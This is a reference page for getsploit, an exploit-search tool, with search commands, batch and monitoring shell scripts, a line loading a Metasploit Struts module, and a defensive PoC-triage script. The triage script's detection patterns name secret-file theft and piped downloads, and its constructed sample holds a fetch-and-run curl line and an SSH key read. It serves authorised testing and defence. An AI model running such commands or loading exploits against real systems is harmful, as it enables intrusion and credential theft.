getsploit
Overview
getsploit is a command-line tool that searches and downloads exploit code from multiple repositories including Exploit-DB, Metasploit Framework, and Packet Storm Security. It aggregates exploit intelligence for vulnerability research and authorized penetration testing activities.
getsploit is essential for:
- Exploit proof-of-concept research
- Vulnerability validation and verification
- Penetration testing and assessment
- Exploit code adaptation and customization
- Security research and analysis
- Attack surface evaluation
Installation
Prerequisites
- Python 3.6+
- pip (Python package manager)
- Linux/macOS/Windows
- Internet connectivity
Install via pip
# Install from PyPI
pip install getsploit
# Verify installation
getsploit -V
getsploit --help
Install from Source
# Clone repository
git clone https://github.com/vulhub/getsploit.git
cd getsploit
# Install dependencies
pip install -r requirements.txt
# Run directly
python -m getsploit --help
# Or install locally
pip install -e .
# Update to latest version
pip install --upgrade getsploit
# Check version
getsploit --version
Core Commands
Basic Usage
| Command | Purpose | Example |
|---|---|---|
| getsploit <query> | Search for exploits | getsploit apache 2.4.49 |
| getsploit -h | Show help | getsploit -h |
| getsploit -V | Show version | getsploit -V |
| getsploit --update | Update exploit database | getsploit --update |
Search Options
| Option | Purpose | Example |
|---|---|---|
| -e, --edb | Search Exploit-DB only | getsploit -e "CVE-2021-1234" |
| -m, --msf | Search Metasploit only | getsploit -m "windows privilege" |
| -p, --pst | Search Packet Storm only | getsploit -p "php vulnerability" |
| -t, --type | Filter by exploit type | getsploit -t "remote" apache |
Basic Search Operations
Simple Exploit Search
# Search all repositories
getsploit apache 2.4.49
# Search by CVE number
getsploit CVE-2021-44228
# Search by application
getsploit wordpress
# Search by vulnerability type
getsploit "remote code execution"
Search with Repository Filter
# Search Exploit-DB only
getsploit -e "nginx privilege escalation"
# Search Metasploit only
getsploit -m "windows domain privilege"
# Search Packet Storm only
getsploit -p "php injection"
Filter by Exploit Type
# Find remote code execution exploits
getsploit -t "remote" "apache"
# Find local privilege escalation
getsploit -t "local" "kernel"
# Find denial of service
getsploit -t "dos" "dns"
Exploit Database Search Strategies
Search by Vulnerability
# SQL injection exploits
getsploit "sql injection" wordpress
# Cross-site scripting
getsploit "xss" "drupal"
# Path traversal
getsploit "path traversal" php
# Command injection
getsploit "command injection" web
Search by Application
# WordPress vulnerabilities
getsploit wordpress
# Drupal exploits
getsploit drupal
# Apache web server
getsploit apache
# PHP framework vulnerabilities
getsploit laravel
Search by OS/Platform
# Windows privilege escalation
getsploit -t "local" "windows"
# Linux kernel exploits
getsploit -t "local" "linux kernel"
# macOS vulnerabilities
getsploit -t "remote" "macos"
Advanced Search Techniques
Multi-Term Searches
# Combine application and version
getsploit "apache 2.4.49"
# With vulnerability type
getsploit "wordpress 5.0 remote"
# Application and CVE
getsploit "wordpress CVE-2020"
Specific CVE Research
# Log4j vulnerability (widespread)
getsploit CVE-2021-44228
# WordPress plugin vulnerability
getsploit CVE-2020-6450
# Kernel privilege escalation
getsploit CVE-2021-22555
Vulnerability Pattern Searches
# All Struts vulnerabilities
getsploit "apache struts"
# Tomcat exploits
getsploit "tomcat"
# Node.js vulnerabilities
getsploit "node.js" -t "remote"
Download and Extraction
Download Exploit Code
# Search returns exploit information
getsploit apache 2.4.49
# Output shows:
# - Exploit ID
# - Title
# - Type
# - Link to code
# - Source repository
View Exploit Details
# Search with verbose output
getsploit -v apache 2.4.49
# Review exploit information before download
# - Author
# - Verification status
# - Last updated date
Save Search Results
# Redirect output to file
getsploit wordpress > wordpress_exploits.txt
# Save specific results
getsploit -e "sql injection" > edb_sqli.txt
# Parse results programmatically
# (-i: identifiers such as CVE-... are usually printed in upper case)
getsploit apache 2.4.49 | grep -oiE "exploit-[0-9]+|cve-[0-9-]+"
Practical Exploitation Workflows
Vulnerability Assessment Workflow
# 1. Identify target technology
# Example: WordPress 5.0 running
# 2. Search for known vulnerabilities
getsploit "wordpress 5.0"
# 3. Review exploit types
getsploit -e "wordpress 5.0" | grep -i "plugin\|theme"
# 4. Download promising exploits
# (Follow links from search results)
# 5. Analyze code for applicability
# (Test in lab environment first)
Known CVE Exploitation
# 1. Identify CVE
# Example: CVE-2021-44228 (Log4j)
# 2. Find exploits
getsploit CVE-2021-44228
# 3. Search specific sources
getsploit -m CVE-2021-44228 # Metasploit modules
getsploit -e CVE-2021-44228 # Exploit-DB POCs
# 4. Select appropriate exploit
# (Choose by platform, method, complexity)
Application-Specific Research
# 1. Identify running application
# Example: Apache Struts 2.0
# 2. Search comprehensively
getsploit "apache struts"
# 3. Filter by vulnerability type
getsploit -t "remote" "apache struts"
# 4. Research by year
getsploit "struts 2009" # Earlier vulnerabilities
getsploit "struts 2017" # More recent exploits
Integration with Other Tools
Chain with Metasploit
# Find exploit in Metasploit
getsploit -m "apache struts"
# Get module path from results
# Load in msfconsole
# (msfconsole -m adds a module directory; -x runs a console command at startup)
msfconsole -q -x "use exploit/linux/http/apache_struts_rce"
Integration with searchsploit
# Alternative: Use searchsploit (locally cached)
searchsploit "apache struts"
# Cross-reference with getsploit
# (-F -f: treat each non-empty searchsploit output line as a fixed string, not a regex)
getsploit "apache struts" | grep -vFf <(searchsploit -t apache struts | sed '/^$/d')
Organize Results for Testing
# Save organized results
mkdir -p exploit_research/wordpress
getsploit wordpress > exploit_research/wordpress/search_results.txt
mkdir -p exploit_research/drupal
getsploit drupal > exploit_research/drupal/search_results.txt
# Create index
echo "# Exploit Research Results" > exploit_research/README.md
Exploit Classification and Analysis
Classify by Exploitation Method
# Remote code execution
getsploit -t "remote" "application"
# Privilege escalation
getsploit -t "local" "privilege"
# Denial of service
getsploit -t "dos" "service"
# Authentication bypass
getsploit "authentication bypass" app
Analyze Exploit Reliability
# Search for verified/tested exploits
getsploit -e "apache" # Exploit-DB (verified)
# Search for modules
getsploit -m "wordpress" # Metasploit (tested)
# Review multiple sources
getsploit -p "wordpress" # Packet Storm (research)
Filter by Exploit Status
# Recently added exploits
getsploit -e "2024" wordpress
# Older, battle-tested exploits
getsploit -e "2015" linux
# Compare exploit counts
getsploit -m "apache" | wc -l
getsploit -e "apache" | wc -l
Automation Scripts
Batch Vulnerability Scanning
#!/bin/bash
# Search for exploits for multiple CVEs
CVES=(
    "CVE-2021-44228"
    "CVE-2021-22555"
    "CVE-2020-1938"
)
OUTPUT_DIR="cve_research"
mkdir -p "$OUTPUT_DIR"
for cve in "${CVES[@]}"; do
    echo "Researching $cve..."
    getsploit "$cve" > "$OUTPUT_DIR/${cve}_results.txt"
    # Count exploits found
    COUNT=$(wc -l < "$OUTPUT_DIR/${cve}_results.txt")
    echo "$cve: $COUNT results found"
done
Vulnerability Database Builder
#!/bin/bash
# Build database of exploits for target technologies
TARGETS=(
    "wordpress"
    "drupal"
    "joomla"
    "apache"
    "nginx"
)
DB_DIR="exploit_database"
mkdir -p "$DB_DIR"
for target in "${TARGETS[@]}"; do
    echo "Building database for $target..."
    # Search all sources
    getsploit -e "$target" > "$DB_DIR/${target}_edb.txt"
    getsploit -m "$target" > "$DB_DIR/${target}_msf.txt"
    getsploit -p "$target" > "$DB_DIR/${target}_pst.txt"
    # Create summary
    TOTAL=$(($(wc -l < "$DB_DIR/${target}_edb.txt") + \
        $(wc -l < "$DB_DIR/${target}_msf.txt") + \
        $(wc -l < "$DB_DIR/${target}_pst.txt")))
    echo "$target: $TOTAL exploits indexed"
done
Continuous Vulnerability Monitoring
#!/bin/bash
# Monitor new exploits for critical applications
MONITOR_TARGETS=(
    "wordpress"
    "apache"
    "openssh"
)
RESULTS_DIR="vulnerability_monitoring"
mkdir -p "$RESULTS_DIR"
DATE=$(date +%Y%m%d)
for target in "${MONITOR_TARGETS[@]}"; do
    LATEST_FILE="$RESULTS_DIR/${target}_latest.txt"
    CURRENT_FILE="$RESULTS_DIR/${target}_${DATE}.txt"
    # Get current exploits
    getsploit "$target" | sort > "$CURRENT_FILE"
    # Compare with previous
    if [ -f "$LATEST_FILE" ]; then
        NEW_EXPLOITS=$(comm -13 "$LATEST_FILE" "$CURRENT_FILE")
        if [ -n "$NEW_EXPLOITS" ]; then
            echo "New exploits for $target:"
            echo "$NEW_EXPLOITS"
        fi
    fi
    # Update latest
    cp "$CURRENT_FILE" "$LATEST_FILE"
done
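The monitoring script above diffs whole result lines. As an added example (not part of getsploit or of the original page), the functions below diff by normalized CVE ID instead and keep only IDs that are open findings in your own inventory, so a reworded line does not raise a false alert. The file names, the inventory format (one CVE ID per line) and the sample lines are constructed assumptions; no particular getsploit output layout is relied on.

```shell
#!/bin/bash
# Added example, not part of getsploit. It assumes only that CVE IDs appear
# somewhere in each saved result line; no specific output layout is relied on.

# Print well-formed CVE IDs from file $1, upper-cased and de-duplicated.
extract_cves() {
    { grep -oiE 'CVE-[0-9]{4}-[0-9]{4,}' "$1" || true; } |
        tr '[:lower:]' '[:upper:]' | LC_ALL=C sort -u
}

# CVE IDs in the current results ($2) that the previous run ($1) did not have.
# A missing previous file (first run) counts as an empty baseline.
new_cves() {
    local prev cur
    prev=$(mktemp); cur=$(mktemp)
    if [ -f "$1" ]; then extract_cves "$1" > "$prev"; fi
    extract_cves "$2" > "$cur"
    LC_ALL=C comm -13 "$prev" "$cur"
    rm -f "$prev" "$cur"
}

# Of the new CVE IDs, keep those that are open findings in our own inventory
# ($3: one CVE ID per line, e.g. a vulnerability-scanner export).
alert_cves() {
    local inv
    inv=$(mktemp)
    extract_cves "$3" > "$inv"
    new_cves "$1" "$2" | LC_ALL=C comm -12 - "$inv"
    rm -f "$inv"
}

# Constructed sample data: previous run, current run and asset inventory.
demo_alert() {
    local d
    d=$(mktemp -d)
    printf '%s\n' 'sample-1 cve-2021-44228 remote' > "$d/prev.txt"
    printf '%s\n' 'sample-1 CVE-2021-44228 remote' \
        'sample-2 CVE-2021-22555 local' 'sample-3 CVE-2020-1938 remote' \
        'sample-4 CVE-2021- truncated id' > "$d/cur.txt"
    printf '%s\n' 'CVE-2021-22555' 'CVE-2019-0708' > "$d/inventory.txt"
    alert_cves "$d/prev.txt" "$d/cur.txt" "$d/inventory.txt"
    rm -rf "$d"
}

demo_alert   # prints CVE-2021-22555
```

Forcing `LC_ALL=C` on both `sort` and `comm` keeps the two files in the same collation order, which `comm` requires.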
Search Result Analysis
Parse Search Results
# Extract exploit IDs
getsploit apache | grep -oE "EDB-[0-9]+" | sort -u
# Extract CVE references
getsploit wordpress | grep -oE "CVE-[0-9-]+" | sort -u
# Count results by type
getsploit apache | grep -c "remote"
getsploit apache | grep -c "local"
Compare Sources
# Find exploits in Exploit-DB
getsploit -e wordpress > edb_wp.txt
# Find exploits in Metasploit
getsploit -m wordpress > msf_wp.txt
# Find unique to Exploit-DB
comm -23 <(sort edb_wp.txt) <(sort msf_wp.txt)
# Find in all sources
getsploit wordpress | sort -u > all_wp.txt
Best Practices
Responsible Exploit Research
- Verify applicability: Confirm vulnerability affects target before exploitation
- Test in isolated lab: Always test in controlled environment first
- Review exploit code: Analyze code for malicious intent before execution
- Maintain documentation: Track exploit usage for reporting
- Only test authorized targets: Ensure proper authorization before testing
- Keep audit trail: Document all exploit testing activities
- Update regularly: Keep exploit database current with --update
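For the "Review exploit code" item, a first-pass triage can be scripted before anyone reads the file in full. This is an added example, not part of getsploit or the original page: the pattern list is a short, assumed checklist of constructs that act on the analyst's own machine, and the sample PoC is constructed with documentation addresses. A hit means "read this line before running anything", not proof of malice.

```shell
#!/bin/bash
# Added example, not part of getsploit. The patterns are a short checklist of
# constructs that deserve a manual look before a downloaded PoC is run on the
# analyst's machine; a hit is a prompt for review, not proof of malice.

# Print "LINE LABEL" for every flagged line of file $1.
# Returns 1 when something was flagged, 0 otherwise.
triage_poc() {
    local file=$1 flagged=0 label regex lines n
    while read -r label regex; do
        lines=$(grep -nE -- "$regex" "$file" | cut -d: -f1) || true
        for n in $lines; do
            printf '%s %s\n' "$n" "$label"
            flagged=1
        done
    done <<'EOF'
download-piped-to-shell (curl|wget)[^|]*\|[[:space:]]*(ba)?sh
decodes-embedded-blob (base64[[:space:]]+(-d|--decode)|b64decode)
reads-local-secrets (\.ssh/id_|\.aws/credentials|/etc/shadow)
recursive-delete rm[[:space:]]+-[a-z]*r[a-z]*[[:space:]]+(/|~|\$HOME)
EOF
    return "$flagged"
}

# Constructed sample of a tampered PoC; it is only scanned, never executed.
demo_triage() {
    local f rc=0
    f=$(mktemp)
    cat > "$f" <<'POC'
#!/usr/bin/env python3
# constructed sample; hosts are documentation addresses
import base64, os, requests
target = "http://lab.example/"
requests.get(target + "status")
os.system("curl -s http://198.51.100.7/i.sh | sh")
exec(base64.b64decode(BLOB))
open(os.path.expanduser("~/.ssh/id_rsa")).read()
POC
    triage_poc "$f" || rc=1
    rm -f "$f"
    return "$rc"
}

demo_triage || echo "flagged lines need manual review before this PoC is run"
```

Legitimate exploit code can trip these patterns too, because a payload aimed at the target may itself read files or decode data; the point is to force a look at each flagged line inside the isolated lab.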
Effective Search Strategies
- Use specific terms: More specific searches yield relevant results
- Include version numbers: Narrow results with application versions
- Cross-reference CVEs: Verify CVE numbers with multiple sources
- Search all repositories: Different sources contain unique exploits
- Review metadata: Check author, date, and verification status
- Compare multiple exploits: Select most reliable implementation
Troubleshooting
| Issue | Solution |
|---|---|
| No results found | Try broader search terms or different keywords |
| Connection errors | Check internet connectivity; verify target is accessible |
| Old database | Run getsploit --update to refresh exploit database |
| Exploit not found | Try searching by CVE number or different terms |
| Metasploit results | Verify Metasploit Framework installation for module paths |
Update and Maintenance
Keep Database Current
# Update exploit database
getsploit --update
# Schedule regular updates (cron)
0 0 * * * /usr/local/bin/getsploit --update # Daily at midnight
Resources
- GitHub: https://github.com/vulhub/getsploit
- Exploit-DB: https://www.exploit-db.com/
- Metasploit Framework: https://www.metasploit.com/
- Packet Storm Security: https://packetstormsecurity.com/
- CVE Details: https://www.cvedetails.com/
Summary
getsploit aggregates exploit intelligence from multiple authoritative sources:
- Exploit-DB - Largest public exploit repository
- Metasploit Framework - Professional exploitation platform
- Packet Storm Security - Historical vulnerability research
Key capabilities include:
- Multi-repository exploit searching
- Flexible filtering by type and source
- CVE-based vulnerability research
- Integration with exploitation frameworks
- Automated vulnerability monitoring
Use getsploit to research known vulnerabilities, validate attack vectors, and build exploit collections for authorized penetration testing and security assessment activities.